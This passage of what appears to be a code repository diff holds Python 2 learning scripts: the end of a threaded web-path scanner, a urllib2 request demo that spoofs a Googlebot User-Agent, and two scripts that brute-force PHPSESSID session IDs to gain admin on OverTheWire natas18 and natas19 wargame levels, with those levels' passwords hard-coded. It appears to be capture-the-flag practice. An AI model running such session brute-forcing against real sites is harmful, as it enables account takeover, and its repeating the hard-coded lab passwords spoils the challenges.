# Each one runs in a loop that keeps executing until the web_paths queue
# is empty.
for i in range(THREADS):
print 'Spawning thread: ' + str(i)
t = threading.Thread(target=test_remote)
t.start()

View file

@ -0,0 +1,76 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import urllib
def post_general(url):
values = {'name' : 'Dana Scullt',
'location' : 'Virginia',
'language' : 'Python' }
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
def get_general(url):
msg = urllib2.urlopen(url)
print msg.read()
def get_fancy(url):
response = urllib2.urlopen(url)
print 'RESPONSE:', response
print 'URL :', response.geturl()
headers = response.info()
print 'DATE :', headers['date']
print 'HEADERS :'
print '---------'
print headers
data = response.read()
print 'LENGTH :', len(data)
print 'DATA :'
print '---------'
print data
def get_user_agent(url):
headers = {}
headers['User-Agent'] = 'Googlebot'
request = urllib2.Request(url, headers=headers)
request = urllib2.Request('http://www.google.com/')
request.add_header('Referer', 'http://www.python.org/')
request.add_header('User-agent', 'Mozilla/5.0')
response = urllib2.urlopen(request)
#print response.read()
print "The Headers are: ", response.info()
print "The Date is: ", response.info()['date']
print "The Server is: ", response.info()['server']
response.close()
def error(url):
request = urllib2.Request('http://aaaaaa.com')
try:
urllib2.urlopen(request)
except urllib2.URLError, e:
print e.reason
if __name__ == '__main__':
HOST = 'http://www.google.com'
#get_user_agent(HOST)
#get_fancy(HOST)
#post_general(HOST)
#get_user_agent(HOST)
error(HOST)

View file

@ -0,0 +1,33 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + str(i)}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)

View file

@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
URL = 'http://natas19.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)